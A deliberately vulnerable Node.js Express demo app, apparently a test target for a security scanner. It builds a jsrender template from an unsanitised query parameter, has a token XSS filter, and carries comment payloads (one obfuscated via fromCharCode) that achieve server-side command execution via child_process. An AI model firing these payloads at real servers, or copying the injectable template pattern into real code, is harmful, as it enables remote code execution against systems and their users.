const express = require('express')
const app = express()
const port = 3000
var jsrender = require('jsrender');

/*
    npm install express --save
    npm install jsrender --save

    run with:
        node app.js

    Code Exec Example:

        Echos back the response in the template

        http://127.0.0.1:3000/?greeting=Hi%20there%20{{:[1].valueOf.__proto__.constructor.call({},%22return%20global.process.mainModule.constructor._load(%27child_process%27).execSync(%27dir%27).toString()%22)()}}
        http://127.0.0.1:3000/?greeting=Hi%20there%20{{:[1].valueOf.__proto__.constructor.call({},[1].toString().constructor.fromCharCode(114,101,116,117,114,110,32,103,108,111,98,97,108,46,112,114,111,99,101,115,115,46,109,97,105,110,77,111,100,117,108,101,46,99,111,110,115,116,114,117,99,116,111,114,46,95,108,111,97,100,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,83,121,110,99,40,39,100,105,114,32,99,58,92,39,41,46,116,111,83,116,114,105,110,103,40,41))()}}
*/


//https://www.jsviews.com/#jsr-node-quickstart

app.get('/', function(req, res) {
    if(req.query.greeting){
        var greeting = req.query.greeting
        // Filter XSS attacks
        greeting = greeting.replace("<", "")
        greeting = greeting.replace(">", "")
        
    }else{
        var greeting = "Hello"
    }
    var tmpl = jsrender.templates(greeting + ' - {{:name}}<br/>'); // User input included within the template
    var html = tmpl.render({name: "AppCheck"}); // Render
  res.send(html);
});


app.listen(port, () => {
  console.log(`Vulnerable app listening at http://localhost:${port}`)
})